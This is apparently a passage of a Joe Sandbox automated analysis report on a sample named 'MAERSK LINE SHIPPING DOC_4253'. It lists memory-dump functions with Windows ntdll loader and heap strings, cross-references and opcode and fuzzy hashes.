                                                    • Opcode Fuzzy Hash: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                    • Instruction Fuzzy Hash: C271C3B19043059FCB21DF14C888B97BFE8EF95764F540569F9888B28AD734D688CBD2
                                                    Function 017C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • apphelp.dll, xrefs: 017C2462
                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                    • LdrpDynamicShimModule, xrefs: 0180A998
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-176724104
                                                    • Opcode ID: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                    • Instruction ID: 65cee056b2066928d82769b987613b0d3d33d695c8ffef7258e9a05a6f5d972e
                                                    • Opcode Fuzzy Hash: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                    • Instruction Fuzzy Hash: 0B312772700305ABDB369F6D9D85A7AB7B5FB80B04F29005DE910EB299D7705B82CB80
                                                    Function 017B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017B327D
                                                    • HEAP[%wZ]: , xrefs: 017B3255
                                                    • HEAP: , xrefs: 017B3264
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                    • API String ID: 0-617086771
                                                    • Opcode ID: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                    • Instruction ID: 114ac5d1014d6d2fd51be5f960bc4d271419f2ce705a0e88e9c81ced2bce6c37
                                                    • Opcode Fuzzy Hash: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                    • Instruction Fuzzy Hash: F1929971A056499FEB25CF68C484BEEFBF1FF48304F188099E859AB352D734A985CB50
                                                    Function 017B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-4253913091
                                                    • Opcode ID: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                    • Instruction ID: 3f3996ded880afc01c262e04e5cee863ba4d9cb064f5ea5ec26da780ab3128a9
                                                    • Opcode Fuzzy Hash: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                    • Instruction Fuzzy Hash: 04F17B7060060ADFEB26CF68C894BAAF7B5FF44304F1441A9E516DB391D734AA81CFA1
                                                    Function 017C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $@
                                                    • API String ID: 0-1077428164
                                                    • Opcode ID: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                    • Instruction ID: db0707ec75cb0474648c57400a13013647d83ae859605bd890c0634074a79e99
                                                    • Opcode Fuzzy Hash: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                    • Instruction Fuzzy Hash: E6C290716083459FE769CF28C881BABFBE5AF88B14F04896DF989C7241DB34D944CB52
                                                    Function 0179A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                    • API String ID: 0-2779062949
                                                    • Opcode ID: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                    • Instruction ID: 7d9f31a89f7b89aeaaaf4388369b03823759dc53d1df58ea0e69746753f3fa86
                                                    • Opcode Fuzzy Hash: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                    • Instruction Fuzzy Hash: 57A14A759116299BDF329B68CC88BAAF7B8EF48710F1001E9EA09A7251D7359E84CF50
                                                    Function 017C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpCheckModule, xrefs: 0180A117
                                                    • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-161242083
                                                    • Opcode ID: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                    • Instruction ID: c0f141cecd5a7ec74cc0d1f0bc4d602f08999daa9e16230af325f2f954067b4d
                                                    • Opcode Fuzzy Hash: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                    • Instruction Fuzzy Hash: 38719E75A00209DFDB2ADF68C985ABEF7F4FB44704F18406DE912EB255E734AA41CB90
                                                    Function 017B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-1334570610
                                                    • Opcode ID: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                    • Instruction ID: e2e80ba0867003d9a3af703f4812f989f7b952425e9f15f0da59700d005ab3d6
                                                    • Opcode Fuzzy Hash: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                    • Instruction Fuzzy Hash: F361AB716003059FDB29CF28C884BABFBB1FF45704F15859AE449CB292D770E981CB91
                                                    Function 017DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                    • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1783798831
                                                    • Opcode ID: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                    • Instruction ID: b87413ee3b8bd93655c1830a29b9edae4c492469d0ea60f01504acc292a04135
                                                    • Opcode Fuzzy Hash: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                    • Instruction Fuzzy Hash: C94125B2541305ABC722EB68DC89B5BB7F8AF48720F19092EF955C3258E770D900CBD1
                                                    Function 0185C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                    • @, xrefs: 0185C1F1
                                                    • PreferredUILanguages, xrefs: 0185C212
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                    • API String ID: 0-2968386058
                                                    • Opcode ID: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                    • Instruction ID: fdef3bdb83965e3a5db392fe3fdfcf626b9385d07723b3fe6b77b9f90721a755
                                                    • Opcode Fuzzy Hash: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                    • Instruction Fuzzy Hash: 3D414F75A00209ABDF51DAD8C895BEEFBBCEB14744F14406AEA09F7284D7749A448F90
                                                    Function 01834144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                    • API String ID: 0-1373925480
                                                    • Opcode ID: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                    • Instruction ID: 6b6053061c039eec3f4e128d070b8199b29d6c8a53a199562ea4480c5d809fb3
                                                    • Opcode Fuzzy Hash: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                    • Instruction Fuzzy Hash: 3F412631A00A58CBEB26DFD8C844BADBBB8FF95344F180459D901FB791D7748A41CB90
                                                    Function 01824755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpCheckRedirection, xrefs: 0182488F
                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-3154609507
                                                    • Opcode ID: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                    • Instruction ID: 41d53f930765fbe951db4198f86b73259493aed621d9725720733f8b19d922f6
                                                    • Opcode Fuzzy Hash: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                    • Instruction Fuzzy Hash: C441D072A102759FCB23CE6CD840A26BBE4BF49B50F060269ED58D7311D770DA80CBA1
                                                    Function 017B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-2558761708
                                                    • Opcode ID: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                    • Instruction ID: 3c763fe673eaabd453c88562c3eda205688897da9d3ffc08dcdd715f5078d7bd
                                                    • Opcode Fuzzy Hash: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                    • Instruction Fuzzy Hash: C711DE7131450ACFDB6ACB18D8D4BABF3A4AF40B15F198159F006CB291DB30D940CB61
                                                    Function 018220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpInitializationFailure, xrefs: 018220FA
                                                    • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2986994758
                                                    • Opcode ID: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                    • Instruction ID: aa50c96267b2bac563a35ee17b113a3db54e1352fa5120a166370d33eba1a873
                                                    • Opcode Fuzzy Hash: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                    • Instruction Fuzzy Hash: 60F0F675680718BBEB25EB4CCC56F9977ADFB40B54F240069FA00F7285D6B0AB40CA91
                                                    Function 017B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: #%u
                                                    • API String ID: 48624451-232158463
                                                    • Opcode ID: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                    • Instruction ID: 8bdd5adc75cc3361716b9acef270047f066b38caef303b9d393b109b3891506f
                                                    • Opcode Fuzzy Hash: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                    • Instruction Fuzzy Hash: B5712C71A0014A9FDB12DFA8C994FAEB7F8BF18704F144065EA05E7255EB38EE41CB61
                                                    Function 017AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrResSearchResource Exit, xrefs: 017AAA25
                                                    • LdrResSearchResource Enter, xrefs: 017AAA13
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                    • API String ID: 0-4066393604
                                                    • Opcode ID: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                    • Instruction ID: 8e0c5c59ec8719c7be617b8fc3eaa9466676a8af4b95157da276ee48e9baad7a
                                                    • Opcode Fuzzy Hash: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                    • Instruction Fuzzy Hash: 12E19471E00219DFEB22CF99CD94BAEFBBABF98350F500569E901E7291D7749A40CB50
                                                    Function 0186A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction ID: 938ade231ab903273e5c5ada9832a35f0349b64c84c53a83b7445840692d7f5c
                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction Fuzzy Hash: DAC1F4312043469BE729CF28C845B6BBBE9BFC4318F084A2CF696DB291D775DA05CB51
                                                    Function 0181E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 81831ca1a5822f4b9ab8b349a174a10d0213d700c9ab883cd56713c01c84fb4b
                                                    • Instruction ID: cd5b13cd146aec8802ab59db9cd1e2b5a905611da4bc6a218c1f4915006d26fb
                                                    • Opcode Fuzzy Hash: 81831ca1a5822f4b9ab8b349a174a10d0213d700c9ab883cd56713c01c84fb4b
                                                    • Instruction Fuzzy Hash: 00616072E003099FEB15DFA8C844BAEBBF9FB48704F14446DEA59EB255D731AA40CB50
                                                    Function 018443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$MUI
                                                    • API String ID: 0-17815947
                                                    • Opcode ID: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                    • Instruction ID: fc34e15d1f17c03acce5b161a2afc7cf080d5e6bf77ebceb4df8b4ca8af2d50e
                                                    • Opcode Fuzzy Hash: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                    • Instruction Fuzzy Hash: 3D512871E0021DAFDF11DFA9CC84BEEBBBDAB48754F100529E615F7291DA709A05CBA0
                                                    Function 017A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • kLsE, xrefs: 017A0540
                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017A063D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                    • API String ID: 0-2547482624
                                                    • Opcode ID: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
                                                    • Instruction ID: e6cd202b16fc595f3a1bb8aed7baaa13bddfd9b978bb5464d4a3c53912e9dc2f
                                                    • Opcode Fuzzy Hash: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
                                                    • Instruction Fuzzy Hash: CC519A715047428FD724EF68C444AA7FBE4AFC4308F644E3EEAEA87241E770A545CB92
                                                    Function 017AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA309
                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA2FB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                    • API String ID: 0-2876891731
                                                    • Opcode ID: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                    • Instruction ID: 0202c504af76c636a9454b9fda2ce6feb1891ddf0dba23fbd0ba0baf248917d2
                                                    • Opcode Fuzzy Hash: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                    • Instruction Fuzzy Hash: 7C41E130A04659DBEB12CF6DC894B6EBBB5FF85300F1441A5E900DB291E7B5DA40CB41
                                                    Function 017DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Cleanup Group$Threadpool!
                                                    • API String ID: 2994545307-4008356553
                                                    • Opcode ID: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                    • Instruction ID: 8449aaa76f2dc418e5a0ff2cb4cf5c349369a78130bda45f353e80901d28f71e
                                                    • Opcode Fuzzy Hash: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                    • Instruction Fuzzy Hash: DD01D1B2244708EFE311DF14CD49B26B7F8FB84715F058979A648C7190E374D904CB46
                                                    Function 017AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: MUI
                                                    • API String ID: 0-1339004836
                                                    • Opcode ID: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                    • Instruction ID: 94453ae562ebc6daa369c65ab1f43bdfcf6fc7832dea6bc3d6af40b7d38bd2e1
                                                    • Opcode Fuzzy Hash: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                    • Instruction Fuzzy Hash: 19827B75E002189FEB25CFA9C884BEDFBB5BF88310F548269E919AB751D7309981CF50
                                                    Function 01826420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                    • Instruction ID: 144ea78823a1c5e9a9e1a31fabaa4d8a1a1489511fe93c58af4001965c673129
                                                    • Opcode Fuzzy Hash: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                    • Instruction Fuzzy Hash: CE916771900229AFEB22DF95CD85FAEBBB8EF18B50F204059F600EB195E774AD40CB50
                                                    Function 0184E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 0b929f01adab17296cd7bdcf410082f34b5833e8697b454c69378c3a2ea4027d
                                                    • Instruction ID: c5a932a9f97a0a17d4ed3a073443a91b40165407f69d3d7cc67cba4e84f9e376
                                                    • Opcode Fuzzy Hash: 0b929f01adab17296cd7bdcf410082f34b5833e8697b454c69378c3a2ea4027d
                                                    • Instruction Fuzzy Hash: 79918F3190061DABDB22ABA5DC88FAFBBB9FF45744F100029F501E7251EB389A01CB51
                                                    Function 017DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GlobalTags
                                                    • API String ID: 0-1106856819
                                                    • Opcode ID: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                    • Instruction ID: ae04b588e86351c7b0ac8a90374a4e18ff1a0bc04df4dcf791531cf0e3712640
                                                    • Opcode Fuzzy Hash: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                    • Instruction Fuzzy Hash: 08716FB6E0020ACFDF28CF9CD5906ADBBB5BF48710F24852EE945E7248E7719A41CB50
                                                    Function 01844978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .mui
                                                    • API String ID: 0-1199573805
                                                    • Opcode ID: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                    • Instruction ID: 7925e3e0f553ff873d11362ca8a676235e334398f0ada4693333bf3eab9ca0e5
                                                    • Opcode Fuzzy Hash: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                    • Instruction Fuzzy Hash: 12519172D0022E9BDF10DF99D844BAEFBB4AF08B54F054129EA11FB255DB349A01CBE4
                                                    Function 017BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
